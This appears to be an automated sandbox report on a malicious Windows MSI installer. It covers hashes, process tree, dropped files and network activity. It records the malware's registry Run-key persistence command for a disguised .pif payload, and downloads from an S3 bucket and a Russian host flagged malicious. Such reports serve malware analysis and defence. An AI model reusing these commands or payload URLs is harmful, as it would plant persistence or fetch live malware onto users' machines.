File name: | FAT#Q5VHKWX03 .msi |
Full analysis: | https://app.any.run/tasks/bdb4c7b5-68c9-46a6-9d35-53a7312ddbc8 |
Verdict: | Malicious activity |
Analysis date: | September 10, 2019, 22:49:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-msi |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {9F4AD185-A744-443F-8238-BAAB0691AFF0}, Number of Words: 10, Subject: Windows Installer, Author: Windows Installer, Name of Creating Application: Advanced Installer 12.2.1 build 64247, Template: ;1033, Comments: This installer database contains the logic and data required to install Windows Installer. |
MD5: | FA8B0B867B1C0D30ACE0E3E63BB35C0E |
SHA1: | 403882F86D074BC30700FBDE0A5CE9C0F1371628 |
SHA256: | E7D224387B5A531F45592DEF4030F6C7B4EBC3E1BE373223460E93CE3B2A15A0 |
SSDEEP: | 3072:rm2kc9/3DaYIA5wgz88ereWn/7w05g0546PMcB3RUN46ILJ9+ZB5yOanYG:rmC3DaYIA08er1nzTv4XrPG |
.msi | | | Microsoft Windows Installer (88.6) |
---|---|---|
.mst | | | Windows SDK Setup Transform Script (10) |
.msi | | | Microsoft Installer (100) |
Comments: | This installer database contains the logic and data required to install Windows Installer. |
---|---|
Template: | ;1033 |
Software: | Advanced Installer 12.2.1 build 64247 |
LastModifiedBy: | - |
Author: | Windows Installer |
Subject: | Windows Installer |
Words: | 10 |
RevisionNumber: | {9F4AD185-A744-443F-8238-BAAB0691AFF0} |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Pages: | 200 |
ModifyDate: | 2009:12:11 11:47:44 |
CreateDate: | 2009:12:11 11:47:44 |
LastPrinted: | 2009:12:11 11:47:44 |
Keywords: | Installer, MSI, Database |
Title: | Installation Database |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2868 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\FAT#Q5VHKWX03 .msi" | C:\Windows\System32\msiexec.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2244 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3356 | C:\Windows\system32\MsiExec.exe -Embedding D9AA18CE5753176E17A18C7DE9DC85B2 | C:\Windows\system32\MsiExec.exe | msiexec.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
3372 | "C:\Windows\System32\cmd.exe" /C start /MIN http://google.com.br/ | C:\Windows\System32\cmd.exe | — | MsiExec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3120 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3752 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3120 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
980 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7600.16385 (win7_rtm.090713-1255) | ||||
2352 | "C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 69_SMCSvMoOg /t reg_sz /d "C:\Users\admin\Documents\ad9a435e-dda5-83cd-588ab17311b1\106E5AD18D45175374212\{C49249F5-B9A4-F7F9DA622BB}\Common\SMCSvMoOg.pif" | C:\Windows\System32\cmd.exe | — | MsiExec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2960 | reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 69_SMCSvMoOg /t reg_sz /d "C:\Users\admin\Documents\ad9a435e-dda5-83cd-588ab17311b1\106E5AD18D45175374212\{C49249F5-B9A4-F7F9DA622BB}\Common\SMCSvMoOg.pif" | C:\Windows\system32\reg.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2672 | "C:\Users\admin\Documents\ad9a435e-dda5-83cd-588ab17311b1\106E5AD18D45175374212\{C49249F5-B9A4-F7F9DA622BB}\Common\SMCSvMoOg.pif" | C:\Users\admin\Documents\ad9a435e-dda5-83cd-588ab17311b1\106E5AD18D45175374212\{C49249F5-B9A4-F7F9DA622BB}\Common\SMCSvMoOg.pif | — | MsiExec.exe |
User: admin Company: Disc Soft Ltd Integrity Level: MEDIUM Description: Disc Soft Bus Service Pro Version: 8.2.1.0709 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2244 | msiexec.exe | C:\Windows\Installer\MSIB1F0.tmp | — | |
MD5:— | SHA256:— | |||
2244 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFFCF4595C875F6F17.TMP | — | |
MD5:— | SHA256:— | |||
3120 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3120 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3752 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][1].txt | — | |
MD5:— | SHA256:— | |||
3752 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VJYTIH3P\google_com_br[1].txt | — | |
MD5:— | SHA256:— | |||
2244 | msiexec.exe | C:\Windows\Installer\16b088.msi | executable | |
MD5:FA8B0B867B1C0D30ACE0E3E63BB35C0E | SHA256:E7D224387B5A531F45592DEF4030F6C7B4EBC3E1BE373223460E93CE3B2A15A0 | |||
3752 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | |
MD5:3E759210110FB89E9D58050191C4F1BC | SHA256:0A256F572AD83710652DE6FAA5499C77910CDD57433967E90F0A95AA0B518444 | |||
3752 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][2].txt | text | |
MD5:FD6D6FF85CAEDD4C2F26054E5F12E192 | SHA256:1F51B5718B2C018C897EC671D144C1F396A8E41ACC3742944B43615D814D1316 | |||
3752 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:CEAEDE0658C2D03BFCA8341800B8C6D3 | SHA256:B99E0A9A7A50CEB96AAE3682CBED27F4AE6F1F2360182F659D457D3AFE5C2D47 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3356 | MsiExec.exe | GET | 200 | 52.95.164.60:80 | http://0909-app-brasil-mais-poder.s3-sa-east-1.amazonaws.com/NEWWWWWWWWWWWWWWZIP%20%285%29.zip | US | compressed | 7.93 Mb | shared |
3356 | MsiExec.exe | GET | 200 | 77.222.62.31:80 | http://zfwbfurusa.temp.swtest.ru/001/ | RU | — | — | malicious |
3752 | iexplore.exe | GET | 302 | 172.217.23.131:80 | http://www.google.com.br/ | US | html | 234 b | whitelisted |
3120 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3752 | iexplore.exe | GET | 301 | 172.217.21.227:80 | http://google.com.br/ | US | html | 222 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3752 | iexplore.exe | 172.217.23.131:443 | www.google.com.br | Google Inc. | US | whitelisted |
3752 | iexplore.exe | 172.217.21.227:80 | google.com.br | Google Inc. | US | whitelisted |
3120 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3752 | iexplore.exe | 172.217.23.131:80 | www.google.com.br | Google Inc. | US | whitelisted |
3120 | iexplore.exe | 172.217.23.131:443 | www.google.com.br | Google Inc. | US | whitelisted |
3356 | MsiExec.exe | 52.95.164.60:80 | 0909-app-brasil-mais-poder.s3-sa-east-1.amazonaws.com | — | US | shared |
3356 | MsiExec.exe | 77.222.62.31:80 | zfwbfurusa.temp.swtest.ru | SpaceWeb Ltd | RU | malicious |
Domain | IP | Reputation |
---|---|---|
0909-app-brasil-mais-poder.s3-sa-east-1.amazonaws.com |
| shared |
www.bing.com |
| whitelisted |
google.com.br |
| whitelisted |
www.google.com.br |
| whitelisted |
zfwbfurusa.temp.swtest.ru |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3356 | MsiExec.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |